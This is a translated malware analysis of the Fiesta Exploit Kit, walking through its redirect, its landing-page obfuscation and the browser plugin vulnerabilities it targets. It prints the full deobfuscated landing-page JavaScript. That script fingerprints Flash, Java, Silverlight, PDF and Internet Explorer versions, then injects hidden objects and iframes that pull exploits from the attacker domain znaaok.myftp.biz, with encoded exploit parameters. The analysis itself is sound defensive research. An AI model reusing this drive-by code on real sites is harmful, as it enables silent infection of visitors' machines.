
                    Original article: http://drops.wooyun.org/tips/4858

                    0x00 Introduction


                    from:http://blog.0x3a.com/post/110052845124/an-in-depth-analysis-of-the-fiesta-exploit-kit-an

                    In this article I will walk step by step through how the Fiesta Exploit Kit works: how it redirects, how it attacks and infects the client (with a Flash exploit, a Java exploit and a PDF exploit), and finally how to decrypt its payloads.

                    The first step was infecting my virtual machine; fortunately the redirect page was still online.

                    image

                    Just before the end of the page a small snippet of code is inserted. It is slightly obfuscated, but easy to decode:

                    image

                    The exploit kit is hosted on the domain znaaok.myftp.biz, which at the time pointed to the IP 92.63.87.16. Looking that IP up in VirusTotal's passive DNS shows many similar domains:

                    image

                    All of these domains are only active for a very short time and are rotated frequently.

                    0x01 The landing page


                    Continuing the analysis: every page loaded in the VM's browser had JavaScript code injected into it:

                    image

                    In this case the exploit was a Flash exploit with MD5 f77e25d5a04d8035d49a27d1b680e35d.

                    When the sample was submitted to VirusTotal, only 3 of 57 antivirus engines detected it.

                    From the Fiddler requests the following sequence can be established:

                    76: the client visits the landing page
                    80: the client downloads the Flash exploit
                    81: after successful exploitation the client executes the payload
                    

                    Starting over: when I opened the page in Sublime I immediately recognised it as something I had already seen in 2013. Apart from some random text strings at the top, the JavaScript obfuscation is identical:

                    image

                    The deobfuscation work:

                    1. Search for the decrypter string
                    2. Decrypt all the functions and strings that are used
                    3. Replace all the variables that are used
                    4. Remove all split strings (e.g. var a = 'from' + 'Char' + 'Code')
                    5. Clean up the code (remove unused variables)
                    6. Give the variables and functions readable names
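
Steps 2 to 5 above, as an added Python example (not code from the original post or from the Fiesta kit): a tiny regex-driven pass that replaces every decrypter call with its decrypted literal, folds split string concatenations, and removes alias globals such as lintl. The decrypter name messop and the alias lintl are taken from the article; the stand-in decrypt function (hex plus single-byte XOR) and the sample JavaScript are constructed for the example and are not Fiesta's real routine.

```python
import re

# Constructed stand-in for the landing page's string decrypter (messop()).
# Fiesta's real routine is not reproduced here; this one just undoes a
# hex-encoded single-byte XOR so the pipeline has something to call.
def stand_in_decrypt(encoded: str, key: int = 0x5A) -> str:
    return bytes(b ^ key for b in bytes.fromhex(encoded)).decode("ascii")

def stand_in_encrypt(plain: str, key: int = 0x5A) -> str:
    return bytes(b ^ key for b in plain.encode("ascii")).hex()

# A simple JS string literal without escape sequences (enough for this kind of obfuscation).
_STR = r"(?:'[^'\\]*'|\"[^\"\\]*\")"
_CONCAT = re.compile(rf"({_STR})\s*\+\s*({_STR})")

def js_literal(s: str) -> str:
    """Re-emit a Python string as a single-quoted JS literal."""
    return "'" + s.replace("\\", "\\\\").replace("'", "\\'") + "'"

def replace_decrypt_calls(js: str, fn_name: str, decrypt) -> str:
    """Step 2: replace fn_name('...') with the literal the call decrypts to."""
    pat = re.compile(rf"\b{re.escape(fn_name)}\(\s*({_STR})\s*\)")
    return pat.sub(lambda m: js_literal(decrypt(m.group(1)[1:-1])), js)

def fold_split_strings(js: str) -> str:
    """Step 4: join 'from' + 'Char' + 'Code' into 'fromCharCode', repeating until stable."""
    prev = None
    while prev != js:
        prev = js
        js = _CONCAT.sub(lambda m: js_literal(m.group(1)[1:-1] + m.group(2)[1:-1]), js)
    return js

def substitute_aliases(js: str, aliases: dict) -> str:
    """Steps 3 and 5: drop 'var alias = ...;' declarations and inline the real name."""
    for name, value in aliases.items():
        js = re.sub(rf"^[ \t]*var\s+{re.escape(name)}\s*=[^;]*;[ \t]*\n?", "", js, flags=re.M)
        js = re.sub(rf"\b{re.escape(name)}\b", lambda _m, v=value: v, js)
    return js

def deobfuscate(js: str, decrypt_fn_name: str = "messop", decrypt=stand_in_decrypt, aliases=None) -> str:
    js = replace_decrypt_calls(js, decrypt_fn_name, decrypt)
    js = fold_split_strings(js)
    return substitute_aliases(js, aliases or {})

# Constructed sample in the shape of the landing page: an alias global, a split
# string, and an encrypted property name passed through the decrypter.
SAMPLE_JS = (
    "var lintl = window.document;\n"
    "var a = 'from' + 'Char' + 'Code';\n"
    "var el = lintl[messop('" + stand_in_encrypt("createElement") + "')]('div');\n"
)

if __name__ == "__main__":
    print(deobfuscate(SAMPLE_JS, aliases={"lintl": "window.document"}))
```

Run on the constructed sample this yields `var a = 'fromCharCode';` and `var el = window.document['createElement']('div');`, which is the point at which step 6 (renaming) becomes a manual job. The regexes deliberately ignore escape sequences and string contents, so on a real landing page the output still needs a human read-through.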
                    

                    Step one, find the decryption function:

                    image

                    Interestingly, Fiesta has not changed the decryption function, only the key, as can also be seen in the messop() function:

                    image

                    So how do we decode the strings in that obfuscated code? Simple: the top part of the decryption function actually comes from the bonyv() function and the bottom part from the seam9j function; give them readable names.

                    Now every call to the messop() function can be replaced:

                    image

                    As you can see, most of the variables declared at the top are globals. After decrypting all the strings we start replacing the globals (e.g. lintl becomes window.document) to make the code more readable. After tidying up, the structure of the page is much clearer:

                    #!javascript
                    function CheckWindowsInUA() {
                        return (/Win64;/i.test(window.navigator.userAgent) || /x64;/i.test(window.navigator.userAgent));
                    }
                    
                    function InjectScript(script) {
                        var injected_element = window.document.createElement("div");
                        window.document.body.appendChild(injected_element);
                        injected_element.innerHTML = script
                    }
                    
                    function InjectIframe(url) {
                        var injected_iframe = window.document.createElement("iframe");
                        injected_iframe.frameBorder = '0';
                        injected_iframe.width = '10';
                        injected_iframe.height = '10';
                        injected_iframe.src = url;
                        window.document.body.appendChild(injected_iframe);
                        return injected_iframe
                    }
                    
                    function isStringContainingNumber(item) {
                        return (typeof item == 'string' && /\d/.test(item))
                    }
                    
                    function ExtractVersionNumbers(data) {
                        var double_num_regx = /[\d][\d\.\_,-]*/;
                        var extracted_vnumbers = isStringContainingNumber(data) ? double_num_regx.exec(data) : null;
                        return extracted_vnumbers ? extracted_vnumbers[0].replace(/[\.\_,-]/g, ',') : null
                    }
                    
                    function GetTridentVersion() {
                        if (!/Trident\/(\d)/i.test(window.navigator.userAgent)) {
                            return 0
                        } else {
                            return parseInt(RegExp.$1)
                        }
                    }
                    
                    function NormalizeVersionInfo(data, vlength) {
                        var templ_array = ['0', '0', '0', '0'];
                        var versioninfo = ExtractVersionNumbers(data.replace(/\s/g, '')).split(',');
                        for (var i = 0; i < versioninfo.length; i++) {
                            if (!(/\d/.test(versioninfo[i]))) {
                                versioninfo[i] = '0'
                            }
                        }
                        return versioninfo.concat(templ_array).slice(0, vlength)
                    }
                    
                    function IsActiveXAvailable() {
                        return (typeof window.ActiveXObject != 'undefined');
                    }
                    
                    function PadVersionInfo(vinfo, padding_size, prepend_padding) {
                        while (vinfo.length < padding_size) {
                            vinfo = prepend_padding ? '0' + vinfo : vinfo + '0'
                        }
                        return vinfo
                    }
                    
                    function CreateFirstAvailableActiveXObject(obj_array) {
                        for (var i = 0; i < obj_array.length; i++) {
                            try {
                                var obj = new ActiveXObject(obj_array[i]);
                                if (obj) {
                                    return obj
                                }
                            } catch (exc) {}
                        }
                        return null
                    }
                    
                    function GetAdobeFlashVersion() {
                        try {
                            if (GetTridentVersion() == 7 || IsActiveXAvailable()) { // Is it MSIE 11 or is ActiveX available
                                var flash_obj = CreateFirstAvailableActiveXObject(["ShockwaveFlash.ShockwaveFlash"]); // Takes an array of ProgIDs like the other calls
                                if (flash_obj) {
                                    var versioninfo = NormalizeVersionInfo(flash_obj.GetVariable("$version"), 4);
                                    var padded_versioninfo = PadVersionInfo((versioninfo.slice(0, 3).join('')), 6, false);
                                    return [padded_versioninfo, versioninfo[3]]
                                }
                            }
                        } catch (exc) {}
                        return null
                    }
                    adobeflash_version_info = GetAdobeFlashVersion();
                    
                    // Adobe Flash Player CVE-2014-8439
                    function AdobeFlashExploit_CVE20148439() {
                        if (adobeflash_version_info != null && adobeflash_version_info[0] >= 120000 && adobeflash_version_info[0] <= 150000 && (adobeflash_version_info[0] != 150000 || adobeflash_version_info[1] < 189)) {
                            var exploit_params = "piw6lxXpfkwegJaaRh9yYgEZVLcA55HsZ68S1_F1pgbBWY2pBlgF1KzoEp2_Vrzpm4QERd5HhfMQnX2YZU87ekOFPqqWr7w5gzAQpubXJNPmHRV6MQ4Kx4z5VnkuHXgvl9TEePJvZ2GWcTfa-Jns94w-fb9PKnu1OTZaAEIEUAkkUEPodUhfqXslvZJWGXBPjofZyQo5vZ-14ChOmHzf8tWNnRVXFj_bM1kY8HoQ81LvfCZAf-nWvUZAHoR8Jb9FuniDwzmiGv2HKtvV6eef-RgXRDczxIcnw5Tna20sd09SJIY3JWo7Ujo3k3U4gna2J4c2RXhKanqwSkaRwp6rt5lz4OUl2tdtRol2OdtwaG8n0P8EouyzUGHCNKZ1ClbsunXhw6_MTUhdCeNlmxiuqk65st34XERp7FIyoC9k6c5kxtoq_6cNfk8zAZLtIO2QfKm7-H2WjB3wl1i-8PkbsSx7gF2RyVPM7oLJWtHwlbfE03JHtk04dCyQaxDzONPHfvVQcGMlvD6-1TMBctB3Zmjtj9zaa8BBaMJM7ivmOqKThtGQJLil2u8XMjH0ivihNjXoYYcMNynbkB9P7VL3wvRSbks3I6f_6FWX9xp3UrejTGFjB-dDcx4lxu0Mg6Gx1PPDG6krSynCyvyPMr_DNt3GE3lgIpchO2Md7UYHb-0zbDvGQ-mwVJ58cZbi62lXVFY2ZgpJIpLgNqiia44rAIbJIvxGCt00fTn4PTOAdRDHq9XCB1RKQ_wGohmAL5ztpg52RUaYa71LyG5yuteeu7kz2ph8BpRSsdvP3dqjRluSk224GVJdBx_PZ9Qnr4yqrYica48cyGlp6JN89Jb0v9B5r6KFtlia-K9_kfkKYReic_v6GKPVLRfC0Eq8RdX6tmckvWIdfBnxjRcM-HrL3zIL3_IL39sieJ-SS1OogSemH-2uH-2iOio3F7S6VHfaxxKB7cdR3HG-kaFqPnpmuaaw3Ip2k_F8folcYRKm9kCPYvtlSutX_bdEPBA6A2ZoE90adMKiiJusiJDriJdliGmpi5g-tRleE12-CDTTxH8hx1RECR-JuaLVgheHWPZ7c0z6dSvp2-bOaLzrTSNuEWODpVITQ3O7CNZ9C4mbg4n5ZoXeC0CIzdV75R1Sk0XG5Adwoy7GrG8ZbmvDeUDM-9O7Arh1BL1k4bm7W6-KU3zHsvhrh9yN3KU2kQb_qDYsvv3V_qVEzybFz9tZxRHHUvgmfGQWUirBU4PBbnJ1uCCBV8YrgOncBNdSjJVTHJoFjkaj0JUbJkR0f4SkGIxkwjxkUyxkdyb7wYwzAuracpjrApTQfOy13sCQWTaXHpvLRkkGxz0Uy3GSAZ2pTuIReLzpCNpRoRsr6LyF2EK1Cm-1JFzCdwMOAfz-vGbDEKFKnetJoHSgpPSz95K5ucMytnRAqJkpLL2-xsrpO4xzNTvt0l9qprz5KHep8F7dOaAvNGLpW7kvW6LTxNjIPb69bYOIDS7WVwrrbS7X2H6f5HqcZzZdOQKeCBuSCqWiM5AsVaAsMcLNM4hSIltlMvZWMTWHD4lHMTlKMTly2SlJkwlTH4LYHyDSVTtSBM5mju8To61rciGw8DpauEsb-Mh91Ib5oiFXzOenZ4Se24gJGFYNqOk58i0Wm6ePAnNNmntsEe2zE8PRH0SWZmxpIhm6eT-rV4c-QlKrOsJcDP4lqNQbuMu3_K6xb6pNkq9zwFNLrLDjgR8v-UMWNjGimNfBEtjqQsjqQsjFD4mkrbWVPaU1IQ53gG--JQrclHKyzNcRWJu1LJeSDtZRIsh4gO5GxF5KCTrGxvllxJIQCBrzMBLtxBMwIBhsZQqwZyZeOvkcZ4ZwIvCeMqtUMtxaMtWKMOOaISW7MBWNCS-WqcWYqFOyOsCv";
                    
                            var exploit_inject_script = "<object width=10 height=10 id='swf_id' type='application/x-shockwave-flash'><param name='movie' value='twQHU'/><param name='allowScriptAccess' value='always'/><param name='FlashVars' value='buys0=r_SET&softq='/><param name='Play' value='0'/></object>";
                            exploit_inject_script = exploit_inject_script.replace('r_SET', exploit_params);
                    
                            var exploit_url = "http://znaaok.myftp.biz/ai_qkvu2/1f247c512126d3ff04500b0f005802090150020f0301050a0452500202515409";
                            exploit_url = [exploit_url, adobeflash_version_info[0], adobeflash_version_info[1]].join(';'); // Insert flash major and minor version numbers in URL
                    
                            exploit_inject_script = exploit_inject_script.replace('twQHU', exploit_url); // Insert payload URL
                            InjectScript(exploit_inject_script);
                        }
                    }
                    AdobeFlashExploit_CVE20148439();
                    
                    // Adobe Flash Player CVE-2014-0497
                    function AdobeFlashExploit_CVE20140497() {
                        if (adobeflash_version_info != null && adobeflash_version_info[0] >= 110000 && adobeflash_version_info[0] < 120000) {
                            var exploit_params = "Uty7aGiUrcYF-SKBlUybGiX686yCWAJYkL2tmkcj2hQ6Ter1eQxHH4Ox79uRvZ7Ysf6TNwwD9jGIyAsRUo7uhbiATr4LFUH9Y1MS2cYV7INrs7tmRr-pqrCIvFJ71qMTM19LJqkTyDecQ9pz2kCODWKrBfNdLSL-jPcqt7jVZTqSZarovw2fxsylV_kWfFZ-99AavMpGyB4jQVvpMqxz4HVRS4xQrs_asQkzKVoSK5sTWHiAWyKWCziAxkr8IEJlSFD-WI2_Z5hGBzkSv4TzqxxQH9bf6sZp_-JpgBVQvFFt3N7T3_jjeYjTIs0dNq6AnASAC68b5IVtlJ-_WoR-pQga8IoKGCdsHylRpYtNgjH0BOqEbYpzeLtCgqS15FsWc0ImzK-UB02_E4HxM1R7-JsIMhRXB6RYCUIjAq98YiW8g8-MD3T1G2C2KWdDktmYGF2O2bmsVZFJwxG-uLLbMct7YpdRVvdpCwu45rwNOLiL36ZgqgEXYaeP3j22L4LTTGCYCyged2SLY9xBCzQ3jiUtZRQa1lB61QJ0wev8JVsq18cyObjKbGxnlpeVYNDmgpIn14BUR7KyEZIvICcT_5z0f_ZTcXgixd7VYBxPRQ7CsjyWlyAFuy6-qrp6NZKjHRLEh9Jux7xAM5SPy_2DizdG5K9gcSZ0A5AIeYb6Ny3FNBtNvyXHvDz3utZ2-8N1v9s3U8ow7oN0RHGage3OOngVcDCo7n0nb-nJh-OxE7MGNfmUW5UlMe7NcuPMH96cSo43MutQlyI-kKkdVz9jky52Gc-BXc_tMw4-JwF1NnjtEZIX_qOyPQCQLotvtA79tEmtlmhtkKnINkM3QkDV3TLeFATqpribq-9iEakq177_CWt6_XMVZ5uC4b48atIZrQBF4gX_gZxjI-y6rq2evtVevNgevEsth8-hxbOl7m7zuyIeuyIwD9ETpiOAvIMBqJNazoLPrquLG6RFmIaDk6pHvWViuNqdbYKW1Glrhgh31xvrVYvyQjA9b-XA97Bn61UBPQG82kRW2k_-2kEKNKRxNLIrpGlN5b2PdqTqiCVii5UEd70JcUgVNOHHhzSOuG6ZPoeIiju7zx-OJwA75littbf00GsZ78c5diDa-pP94emjdF_5_lruCbC3IJjvCquJDXyvfKD6FikDB0_MqTz7OkR1XqoS8VDv7jrbC6H6Ox1-EfFGydRiIPZRxtsWVnEfGDCDf7IkfT1Cs-r2W5OFbEtIWeryWmPyctJf2Hhypt9-jPDZLuABT0pJx0xkTUtxO8Vy-JugWe7hhngh_XghWA0hJAYb_UHcMw-ZZ4udM4sXgPFYyX_Xh07Q1K5-aCJvSgUMMEjzQBOprdJRhPrp7h0Rz9smxHyliGKfUSpfT05UPUPsKZ5rVVcm7CH5JMawbPZ0OL6ShvwI5T1dxMkFrQdKkCTJtFeBwS7j66QXLQsI2nvMAc69QLtaDnIGg8mIBDKGBHtHgswjhKdkgs8jl4J7QYj0g4lDwbkLuZtNUklKplcRqFAAqdt9kijWHIjWDRD4D7OzLbPKDW_7O92wlYgwOaIHOaIZewIeRcO5usMSuKIY5t5YLyFuTHRHFn0uTWJJCfZBXVVooiGhznUua0bQ15OUIYHJeY3ehSGFdvOPKURnsJ65K6Jrs6WW72PSoO2PWEosNfBx2V4tE9T-QYnrVWL0MeiNF1_SmWv958ARGyeC2JEJIdKQoPJ-twLx2Z_Gp85sbPpaAsF8ez4MVeRMVe-dlYU_ivlOE9EZ0ltFp7U4lKCfJokpWfOPzXDX8Pqz_HrPVb1oxHNpWNbpWyyotBjwtQKSEvjFuqISEtOXutxfLslXDoOXDROtD_Wk1R5l1HCbVwPaVH17ObvGZrNyOxLsW-jY6olt6sI6Ae1l";
                    
                            var exploit_inject_script = "<object width=10 height=10 id='swf_id' type='application/x-shockwave-flash'><param name='movie' value='xVpWi'/><param name='allowScriptAccess' value='always'/><param name='FlashVars' value='talkh=P69jl&diadx='/><param name='Play' value='0'/></object>";
                            exploit_inject_script = exploit_inject_script.replace('P69jl', exploit_params);
                    
                            var exploit_url = "http://znaaok.myftp.biz/ai_qkvu2/44f7aa1e1db111d0000d510c565a065d0402560c5503015e010004015453505d";
                            exploit_url = [exploit_url, adobeflash_version_info[0], adobeflash_version_info[1]].join(';'); // Insert flash major and minor version numbers in URL
                    
                            exploit_inject_script = exploit_inject_script.replace('xVpWi', exploit_url); // Insert payload URL
                            InjectScript(exploit_inject_script)
                        }
                    }
                    AdobeFlashExploit_CVE20140497();
                    
                    // Get the highest available Java version
                    function GetHighestJavaVersion() {
                        try {
                            var jvms = null;
                            var java_object_class_ids = ["clsid:CAFEEFAC-DEC7-0000-0001-ABCDEFFEDCBA", "clsid:CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA"]; // Initiates the Java Deployment Toolkit
                            for (var clsid_i = 0; clsid_i < java_object_class_ids.length; clsid_i++) {
                                var java_object = window.document.createElement("object");
                                java_object.setAttribute("classid", java_object_class_ids[clsid_i]);
                                if (typeof java_object["jvms"] != 'undefined') {
                                    jvms = java_object["jvms"];
                                    break
                                }
                            }
                            if (jvms != null && jvms.getLength() != 0) {
                                var version = 0;
                                for (var jvm_i = 0; jvm_i < jvms.getLength(); jvm_i++) {
                                    var jvm_verion_info = NormalizeVersionInfo(jvms.get(jvm_i)["version"], 4);
                                    var c_version = parseInt(jvm_verion_info[1].concat(PadVersionInfo(jvm_verion_info[3], 2, true)), 10);
                                    if (c_version > version) { // Check if this version is higher than the previous
                                        version = c_version
                                    }
                                }
                                return version
                            }
                        } catch (exc) {}
                        return null
                    }
                    java_version = GetHighestJavaVersion();
                    java_enabled = window.navigator.javaEnabled();
                    
                    // Java Runtime Environment CVE-2013-2465
                    function JavaExploit_CVE20132465() {
                        if (java_enabled) {
                            if ((java_version && java_version > 630 && java_version < 722) || (!java_version && java_enabled)) {
                                var exploit_inject_script = "<applet width=10 height=10><param name='cent' value='http://znaaok.myftp.biz/ai_qkvu2/44075e88a64ef0cd574c550c025e0f000402000c010708030100520100575900;1;3@@'/><param name='jnlp_href' value='http://znaaok.myftp.biz/ai_qkvu2/49efdc53b7b51fa25e57095d5358020b040f555d50010508010d07505151540b'/></applet>";
                                if (java_version && java_version >= 710) { // Since 7u10 bundling has to be selected for self contained applications (https://blogs.oracle.com/talkingjavadeployment/entry/packaging_improvements_in_jdk_7)
                    
                                    exploit_inject_script = exploit_inject_script.replace("</applet>", "<param name='javafx_version' value='2.0+'/></applet>")
                                }
                                InjectScript(exploit_inject_script)
                            }
                        }
                        return
                    }
                    JavaExploit_CVE20132465();
                    
                    // Java Runtime Environment CVE-2012-0507
                    function JavaExploit_CVE20120507() {
                        if ((java_version && java_version < 631) || (!java_version && java_enabled)) {
                            // Hex encoded string, contains non-ascii characters
                            var exploit_param = "aced0005757200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c020000787000000002757200085b4c6c6170736b3bfe2c941188b6e5ff02000078700000000170737200306a6176612e7574696c2e636f6e63757272656e742e61746f6d69632e41746f6d69635265666572656e63654172726179a9d2dea1be65600c0200015b000561727261797400135b4c6a6176612f6c616e672f4f626a6563743b787071007e0003";
                    
                            var exploit_inject_script = "<applet archive='http://znaaok.myftp.biz/ai_qkvu2/5b76b7bdcefb3f0d5410560d550c555c0554070d5655525f005655005705035c' code='vailt' width=10 height=10><param name='ptas' value='http://znaaok.myftp.biz/ai_qkvu2/5230fd54a64ef0cd564a560b515f020c0504030b5206050f000651065356540c;1;2@@'/><param name='hamm' value='JRgN_'/></applet>";
                    
                            exploit_inject_script = exploit_inject_script.replace('JRgN_', exploit_param);
                            InjectScript(exploit_inject_script)
                        }
                        return
                    }
                    JavaExploit_CVE20120507();
                    
                    function PadNumber(number) {
                        return (number < 10 ? 0 : '') + number.toString()
                    }
                    
                    function FormatVersionString(vdata) {
                        return (vdata[0] + '.' + vdata[1] + '.' + vdata[2] + PadNumber(vdata[3]) + PadNumber(vdata[4]))
                    }
                    
                    function IsSpecifiedVersionSupported(obj, v_array, index, new_vnumber) {
                        var nversion = v_array.slice(0);
                        nversion[index] = new_vnumber;
                        return obj.IsVersionSupported(FormatVersionString(nversion))
                    }
                    
                    function GetSilverlightVersion() {
                        var sl_plugin = null;
                        var sl_descr = null;
                        try {
                            if (GetTridentVersion() == 7 && (sl_plugin = window.navigator.plugins["Silverlight Plug-In"])) { // MSIE 11 available and Silverlight
                                sl_descr = sl_plugin["description"]
                            } else if (GetTridentVersion() == 7 || IsActiveXAvailable()) { // MSIE 11 available and ActiveX
                                var sl_obj = CreateFirstAvailableActiveXObject(["AgControl.AgControl"]);
                                var supported_version = [1, 0, 1, 1, 1]; // Base version
                                var version_supported = 0;
                                var highest_version = [6, 2, 9, 12, 31]; // Highest version we go to
                                if (sl_obj && sl_obj.IsVersionSupported(FormatVersionString(supported_version))) { // Lowest version is available
                    
                                    // Following section bumps version numbers until it hits one not supported
                                    for (var i = 0; i < highest_version.length; i++) {
                                        for (var version_num = supported_version[i] + (i == 0 ? 0 : 1); version_num <= highest_version[i]; version_num++) {
                                            if (!IsSpecifiedVersionSupported(sl_obj, supported_version, i, version_num)) {
                                                break
                                            }
                                            version_supported++;
                                            supported_version[i] = version_num
                                        }
                                    }
                                    if (version_supported) {
                                        sl_descr = FormatVersionString(supported_version)
                                    }
                                }
                            }
                            if (sl_descr) {
                                return NormalizeVersionInfo(sl_descr, 3).join('')
                            }
                        } catch (exc) {}
                        return null
                    }
                    silverlight_version = GetSilverlightVersion();
                    
                    // Microsoft Silverlight CVE-2013-0074
                    function SilverlightExploit_CVE20130074() {
                        if (silverlight_version >= 4050401 && silverlight_version < 5120125) {
                            var exploit_inject_script = "<object data='data:application/x-silverlight-2,' type='application/x-silverlight-2' width=10 height=10><param name='source' value='j2VIH'/><param name='initParams' value='pave=YOsTWLl1BQAASYA0CB+FyXX3/9Bhw+jo////9pMbHx9BluySTLemQW6kT6dtf2hrTfebHB8f45boso78C/eZHB8fjbKO/O2Wz/ewHB8ftPTtpqZsLsina36rH3Uf90ccHx/3IRwfH4jgTAsjGW0rT0t1F3Xg4EwnRY78OE9Ldx8PHx9IdQZN4Ewjjkf8CpQYEKlXHlaSW5cXlBef4j9sHOFcsfdrHR8fjvxtLt+zmt9rSk9I4ExfSUhI4ExbRx7Z9+ceHx+O/Ep1FEdXa1BPn2SxHmsO96YeHx+a32o84Ax5IvsdavufZPIfahJI9ywfHx+a32oU4Vzy9wweHx+O/NZHsh7Z9LuIkmxnSbMmIWrk2BkkLh8fQffgHh8f3HUfdeHgTBtJSEqW+qZEizSL94sdHx+O/GFOkkyHTeBMK5rfa22UTyOW2ZbYHJsPnx8fH5QX/H9/HG8TLt+G5vfJHR8fauee5UFupE9+axqc3wv0wOBvDx7RLtZWXrKa32sqSZJrGB0u34bn97UdHx9q557lSGvf60Fq/kEe4ZQrkUaUTiOUWw4DHFMOMx7XJtFtGybZaRcu39ZAQd0bH0mUag9JsprfauSY6EGSTIFNSeBMT478/05OTuBMU0bZHh9PSUjgTFtH2R9DSEhJmOGymt9q5HVgSeBML5IjGZJcsE9I4EwTdR9J4ErjnOcAaLf0u0lISpb6luGymt9q5ElIkmTxmOGzebSb32rmkmDhSOBMM0jgTFdBdSNGNtOW+E5ILt/stUCQGHVsd3Effh93bR9qH5Z4E6Zwii4Pp7APFLf3Sh4fH5ZYF3V6d3ofZx93ex8xH3d8H3IflngPlmgLprQ7yMinaf7w2Uj3NB4fH9ZAQdxISpb6dUtGNtOW5Zb4SC7f7LVAklAPdVuQHkhOT09PT09PT03gTDfWQNxISS7fT091Hk91HHUcSOBMB19rBleIsnUfS09JSOBMA5rfaxZI4Ew/SOBMO19BQNxJTJbhLt+G4dk2zh7ISE4uxIbh3JUbAR/dmRsJlxsBHRsJlRsZLRi1/fdGQERB3Eou1k6W/U5OTUlOpsKTvginsiHO3vebHx8fQprfanma4Gt7lFofdR9ISuBPL5rfakuUWBea32tST0tP91YfHx+JSUqUWh/gTxNGmt9qKLKNsi7PIllMS09qNLIuzybXajuyLs9PmOic9g/3feDg4E5IdR/gTBdGJtdqFeApSeBMM5jo9B0u30Lcph8PHx+a32odltd1X05PdR/gTA/cT/cXHx8fRvcoHx8f4P9ISUwu4HuUYC+UYBOUYAuW5C7fhpQgJuRrCJRoN5rpa+/m91YfHx+zaugm1ZRYD2r/REFA3H+UTyOW3JbZTxxbD2cu8lp/HEc/HCu0Lt+G5/cEHx8faucm1X5q9xxHOxCoM3QcbwNHHBuxlls7A37cs2wZI35tHTM/3tUSHt2b39x3c3ZxdB9DH1MfcB9oHx8fam1zcnBxH0N8cnsxemd6FkMxMUNxcGt6b357MXpnej8wfD98cG9mPzBGPz06TD0/PTpMPT85OT9sa35taz89PT89Okw9HzB8P2xrfm1rPz09Px/3cOTg4Ll0isDKtC6cZPXeY6eQEWqGpOn/Hx8fH0FupE9hkrtN02ERFB//xKJMX+DXg6DWMfNgx6CAql/rxUORTzTYEtFtf2hrHx8fH0AXpkTq12UnxMHJbR8fHx9IRFR8AYp0mHDjKDuW06LXAA+M9PV/mKQfHx8fHx8fH3dra28lMDBlcX5+cHQxcmZ5a28xfXZlMH52QG50aWotMC4sfih+KC96KXsrKnx5KX0qLSssL34vfCopL3wvKCp7Ly4vKiouL3wqKioqLy8qei8rLygvLC8uKisvKiouKnskKh8fHx8='/></object>";
                    
                            var exploit_url = "http://znaaok.myftp.biz/ai_qkvu2/2b6b367b48844f2e410e4059040d005a0254065907540759075654540604565a";
                            exploit_url = [exploit_url, silverlight_version].join(';'); // Insert Silverlight version numbers in URL
                    
                            exploit_inject_script = exploit_inject_script.replace('j2VIH', exploit_url); // Insert payload URL (renamed from the obfuscated 'jnv')
                            InjectScript(exploit_inject_script) // Renamed from the obfuscated 'pa'
                        }
                    }
                    SilverlightExploit_CVE20130074();
                    
                    // Microsoft Internet Explorer CVE-2013-2551
                    function MSIEExploit_CVE20132551() {
                        var fut, om;
                        var trident_version = GetTridentVersion();
                        if (        !CheckWindowsInUA() &&
                                    (       trident_version == 6 || // Trident version 6, identifies Internet Explorer 10
                                            trident_version == 5 || // Trident version 5, identifies Internet Explorer 9
                                            trident_version == 4)) // Trident version 4, identifies Internet Explorer 8
                        {
                            InjectIframe("http://znaaok.myftp.biz/ai_qkvu2/40319b9a99f7cc915d555f0a0e590e590406030a0d00095a010451070c505859");
                        }
                        return
                    }
                    MSIEExploit_CVE20132551();
                    
                    function GetAdobePDFVersion() {
                        try {
                            // If it's MSIE 11 or ActiveX controls are available, instantiate the PDF object, otherwise null
                            var activex_obj = (GetTridentVersion() == 7 || IsActiveXAvailable()) ? CreateFirstAvailableActiveXObject(["AcroPDF.PDF", "PDF.PdfCtrl"]) : null;
                    
                            var pdf_obj = window.document.createElement("object");
                            pdf_obj.setAttribute("classid", "clsid:CA8A9780-280D-11CF-A24D-444553540000"); // Initiates the 'pdf.ocx' ActiveX control
                            pdf_obj.setAttribute("src", '');
                    
                            var version_string = null;
                            try {
                                    // Get version of either one of the valid objects
                                version_string = (activex_obj || pdf_obj).GetVersions()
                            } catch (exc) {}
                            if (version_string) {
                                var version_extract = version_string.match((/=\s*[\d\.]+/g));
                                var version = 0;
                                for (var i = 0; i < version_extract.length; i++) {
                                    var c_version = parseInt(NormalizeVersionInfo(version_extract[i], 3).join(''), 10);
                                    if (c_version > version) {
                                        version = c_version
                                    }
                                }
                                return version
                            }
                        } catch (exc) {}
                        return null
                    }
                    adobepdf_version = GetAdobePDFVersion();
                    
                    // Adobe PDF CVE-2010-0188
                    function AdobePDFExploit_CVE20100188() {
                        var triden_version = GetTridentVersion();
                        if (triden_version == 4 || triden_version == 5) { // Check for MSIE 8 or 9
                            if ((adobepdf_version >= 800 && adobepdf_version < 821) || (adobepdf_version >= 900 && adobepdf_version < 931)) {
                                var exploit_inject_script = "<object classid='clsid:CA8A9780-280D-11CF-A24D-444553540000' width=10 height=10><param name='src' value='irH3d'/></object>";
                    
                                var exploit_url = "http://znaaok.myftp.biz/ai_qkvu2/6b2f2de7ba83a9dc5a0b505d055f520f0654025d0606550c035650500756040f";
                                exploit_url = [exploit_url, adobepdf_version].join(';'); // Insert Adobe PDF version numbers in URL
                    
                                exploit_inject_script = exploit_inject_script.replace('irH3d', exploit_url);
                                InjectScript(exploit_inject_script);
                            }
                        }
                        return
                    }
                    AdobePDFExploit_CVE20100188();
                    

                    Let's look at which vulnerabilities Fiesta uses:

                    Adobe Flash

                    CVE-2014-8439: Adobe Flash Player before 13.0.0.258 and 14.x and 15.x before 15.0.0.239 on Windows and OS X and before 11.2.202.424 on Linux, Adobe AIR before 15.0.0.293, Adobe AIR SDK before 15.0.0.302, and Adobe AIR SDK & Compiler before 15.0.0.302
                    CVE-2014-0497: Adobe Flash Player before 11.7.700.261 and 11.8.x through 12.0.x before 12.0.0.44 on Windows and Mac OS X, and before 11.2.202.336 on Linux 
                    

                    Adobe PDF

                    CVE-2010-0188: Adobe Reader and Acrobat 8.x before 8.2.1 and 9.x before 9.3.1
                    

                    Java

                    CVE-2012-0507: Java SE 7 Update 2 and earlier, 6 Update 30 and earlier, and 5.0 Update 33 
                    CVE-2013-2465: Java SE 7 Update 21 and earlier, 6 Update 45 and earlier, and 5.0 Update 45 and earlier, and OpenJDK 7 
                    

                    Silverlight

                    CVE-2013-0074: Microsoft Silverlight 5, and 5 Developer Runtime, before 5.1.20125.0 
                    

                    Microsoft Internet Explorer

